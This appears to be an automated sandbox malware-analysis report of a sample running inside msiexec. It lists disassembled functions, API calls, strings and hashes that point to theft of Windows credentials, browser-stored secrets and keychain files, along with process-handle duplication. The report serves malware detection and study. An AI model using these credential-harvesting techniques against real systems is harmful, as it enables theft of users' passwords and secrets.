                                                              Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 354->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 372 40dff8-40dffb 370->372 373 40defd-40df02 370->373 371->370 374 40ded0-40dee1 _wcsicmp 371->374 372->363 375 40dffd-40e006 372->375 376 40df08 373->376 377 40dfef-40dff2 CloseHandle 373->377 374->370 374->375 375->362 375->363 378 40df0b-40df10 376->378 377->372 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                              APIs
                                                              • memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                              • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                              • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                              • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                              • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                              • _wcsicmp.MSVCRT ref: 0040DEB2
                                                              • _wcsicmp.MSVCRT ref: 0040DEC5
                                                              • _wcsicmp.MSVCRT ref: 0040DED8
                                                              • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                              • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                              • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                              • memset.MSVCRT ref: 0040DF5F
                                                              • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                              • _wcsicmp.MSVCRT ref: 0040DFB2
                                                              • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                              • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                              • API String ID: 708747863-3398334509
                                                              • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                              • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                                              • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                              Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 578 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 581 413f00-413f11 Process32NextW 578->581 582 413da5-413ded OpenProcess 581->582 583 413f17-413f24 CloseHandle 581->583 584 413eb0-413eb5 582->584 585 413df3-413e26 memset call 413f27 582->585 584->581 586 413eb7-413ebd 584->586 591 413e79-413e9d call 413959 call 413ca4 585->591 592 413e28-413e35 585->592 588 413ec8-413eda call 4099f4 586->588 589 413ebf-413ec6 free 586->589 593 413edb-413ee2 588->593 589->593 605 413ea2-413eae CloseHandle 591->605 596 413e61-413e68 592->596 597 413e37-413e44 GetModuleHandleW 592->597 598 413ee4 593->598 599 413ee7-413efe 593->599 596->591 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->581 601->596 602->591 605->584
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                              • memset.MSVCRT ref: 00413D7F
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                              • memset.MSVCRT ref: 00413E07
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                              • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                              • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                              • free.MSVCRT ref: 00413EC1
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                              • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                              • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                              • API String ID: 1344430650-1740548384
                                                              • Opcode ID: 7d02fd8a141b21bce287ccd79cf3663acdf79a25f15b62318ca84dc4e74db171
                                                              • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                              • Opcode Fuzzy Hash: 7d02fd8a141b21bce287ccd79cf3663acdf79a25f15b62318ca84dc4e74db171
                                                              • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                              Function 004148B6 Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                              • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                              • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                              • LockResource.KERNEL32(00000000), ref: 004148EF
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindLoadLockSizeof
                                                              • String ID:
                                                              • API String ID: 3473537107-0
                                                              • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                              • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                              • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                              Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                              • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFind$FirstNext
                                                              • String ID:
                                                              • API String ID: 1690352074-0
                                                              • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                              • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                              • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                              Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041898C
                                                              • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: InfoSystemmemset
                                                              • String ID:
                                                              • API String ID: 3558857096-0
                                                              • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                              • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                                              • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                              Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 42 44558e-445594 call 444b06 4->42 43 44557e-44558c call 4136c0 call 41366b 4->43 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 45 445823-445826 14->45 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 53 445879-44587c 18->53 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 73 445685 21->73 74 4456b2-4456b5 call 40b1ab 21->74 30 445605-445607 22->30 31 445603 22->31 28 4459f2-4459fa 23->28 29 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->29 139 44592d-445945 call 40b6ef 24->139 140 44594a 24->140 37 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 28->37 38 445b29-445b32 28->38 157 4459d0-4459e8 call 40b6ef 29->157 158 4459ed 29->158 30->21 41 445609-44560d 30->41 31->30 182 445b08-445b15 call 40ae51 37->182 54 445c7c-445c85 38->54 55 445b38-445b96 memset * 3 38->55 41->21 51 44560f-445641 call 4087b3 call 40a889 call 4454bf 41->51 42->3 43->42 56 44584c-445854 call 40b1ab 45->56 57 445828 45->57 154 445665-445670 call 40b1ab 51->154 155 445643-445663 call 40a9b5 call 4087b3 51->155 67 4458a2-4458aa call 40b1ab 53->67 68 44587e 53->68 63 445d1c-445d25 54->63 64 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 54->64 69 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 55->69 70 445b98-445ba0 55->70 56->13 71 44582e-445847 call 40a9b5 call 4087b3 57->71 78 445fae-445fb2 63->78 79 445d2b-445d3b 63->79 159 445cf5 64->159 160 445cfc-445d03 64->160 67->19 87 445884-44589d call 40a9b5 call 4087b3 68->87 249 445c77 69->249 70->69 88 445ba2-445bcf call 4099c6 call 445403 call 445389 70->88 142 445849 71->142 90 44568b-4456a4 call 40a9b5 call 4087b3 73->90 108 4456ba-4456c4 74->108 95 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 79->95 96 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 79->96 146 44589f 87->146 88->54 148 4456a9-4456b0 90->148 165 445d67-445d6c 95->165 166 445d71-445d83 call 445093 95->166 196 445e17 96->196 197 445e1e-445e25 96->197 122 4457f9 108->122 123 4456ca-4456d3 call 413cfa call 413d4c 108->123 122->6 174 4456d8-4456f7 call 40b2cc call 413fa6 123->174 139->140 140->23 142->56 146->67 148->74 148->90 154->108 155->154 157->158 158->28 159->160 171 445d05-445d13 160->171 172 445d17 160->172 176 445fa1-445fa9 call 40b6ef 165->176 166->78 171->172 172->63 206 4456fd-445796 memset * 4 call 409c70 * 3 174->206 207 4457ea-4457f7 call 413d29 174->207 176->78 200 445b17-445b27 call 40aebe 182->200 201 445aa3-445ab0 call 40add4 182->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->38 201->182 221 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->221 239 445e62-445e69 202->239 240 445e5b 202->240 220 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->220 206->207 248 445798-4457ca call 40b2cc call 409d1f call 409b98 206->248 207->10 220->78 253 445f9b 220->253 221->182 239->203 245 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 239->245 240->239 265 445f4d-445f5a call 40ae51 245->265 248->207 264 4457cc-4457e5 call 4087b3 248->264 249->54 253->176 264->207 269 445ef7-445f04 call 40add4 265->269 270 445f5c-445f62 call 40aebe 265->270 269->265 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->220 274->265 281 445f3a-445f48 call 445093 274->281 281->265
                                                              APIs
                                                              • memset.MSVCRT ref: 004455C2
                                                              • wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 0044570D
                                                              • memset.MSVCRT ref: 00445725
                                                                • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              • memset.MSVCRT ref: 0044573D
                                                              • memset.MSVCRT ref: 00445755
                                                              • memset.MSVCRT ref: 004458CB
                                                              • memset.MSVCRT ref: 004458E3
                                                              • memset.MSVCRT ref: 0044596E
                                                              • memset.MSVCRT ref: 00445A10
                                                              • memset.MSVCRT ref: 00445A28
                                                              • memset.MSVCRT ref: 00445AC6
                                                                • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                              • memset.MSVCRT ref: 00445B52
                                                              • memset.MSVCRT ref: 00445B6A
                                                              • memset.MSVCRT ref: 00445C9B
                                                              • memset.MSVCRT ref: 00445CB3
                                                              • _wcsicmp.MSVCRT ref: 00445D56
                                                              • memset.MSVCRT ref: 00445B82
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                              • memset.MSVCRT ref: 00445986
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                              • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                              • API String ID: 2263259095-3798722523
                                                              • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                              • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                              • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A
                                                              Function 0041276D Relevance: 35.1, APIs: 17, Strings: 3, Instructions: 149COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                              • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                              • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                              • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                              • String ID: $/deleteregkey$/savelangfile
                                                              • API String ID: 2744995895-28296030
                                                              • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                              • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                              • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A
                                                              Function 0040B6EF Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 388fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0040B71C
                                                                • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                                • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                              • wcsrchr.MSVCRT ref: 0040B738
                                                              • memset.MSVCRT ref: 0040B756
                                                              • memset.MSVCRT ref: 0040B7F5
                                                              • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                              • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                              • memset.MSVCRT ref: 0040B851
                                                              • memset.MSVCRT ref: 0040B8CA
                                                              • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              • memset.MSVCRT ref: 0040BB53
                                                              • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                              • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                              • String ID: chp$v10
                                                              • API String ID: 4290143792-2783969131
                                                              • Opcode ID: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                              • Opcode Fuzzy Hash: aa7ff03ddb8a60b54c19e14ecab6b10a2ad5bd81823861da0c4d13f19dc0bdfc
                                                              • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99
                                                              Function 004091B8 Relevance: 25.8, APIs: 16, Strings: 1, Instructions: 272COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 505 4091b8-40921b memset call 40a6e6 call 444432 510 409520-409526 505->510 511 409221-40923b call 40b273 call 438552 505->511 515 409240-409248 511->515 516 409383-4093ab call 40b273 call 438552 515->516 517 40924e-409258 call 4251c4 515->517 528 4093b1 516->528 529 4094ff-40950b call 443d90 516->529 522 40937b-40937e call 424f26 517->522 523 40925e-409291 call 4253cf * 2 call 4253af * 2 517->523 522->516 523->522 553 409297-409299 523->553 531 4093d3-4093dd call 4251c4 528->531 529->510 539 40950d-409511 529->539 540 4093b3-4093cc call 4253cf * 2 531->540 541 4093df 531->541 539->510 543 409513-40951d call 408f2f 539->543 540->531 557 4093ce-4093d1 540->557 545 4094f7-4094fa call 424f26 541->545 543->510 545->529 553->522 554 40929f-4092a3 553->554 554->522 556 4092a9-4092ba 554->556 558 4092bc 556->558 559 4092be-4092e3 memcpy memcmp 556->559 557->531 560 4093e4-4093fb call 4253af * 2 557->560 558->559 561 409333-409345 memcmp 559->561 562 4092e5-4092ec 559->562 560->545 570 409401-409403 560->570 561->522 565 409347-40935f memcpy 561->565 562->522 564 4092f2-409331 memcpy * 2 562->564 567 409363-409378 memcpy 564->567 565->567 567->522 570->545 571 409409-40941b memcmp 570->571 571->545 572 409421-409433 memcmp 571->572 573 4094a4-4094b6 memcmp 572->573 574 409435-40943c 572->574 573->545 576 4094b8-4094ed memcpy * 2 573->576 574->545 575 409442-4094a2 memcpy * 3 574->575 577 4094f4 575->577 576->577 577->545
                                                              APIs
                                                              • memset.MSVCRT ref: 004091E2
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                              • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                              • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                              • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                              • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                              • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                              • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                              • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                              • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                              • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                              • String ID:
                                                              • API String ID: 3715365532-3916222277
                                                              • Opcode ID: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                              • Opcode Fuzzy Hash: 84d8fa7e2563b014b86416b64341180d82413736d9254b8658418cb4f91a0b1c
                                                              • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59
                                                              Function 0040E01E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120fileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
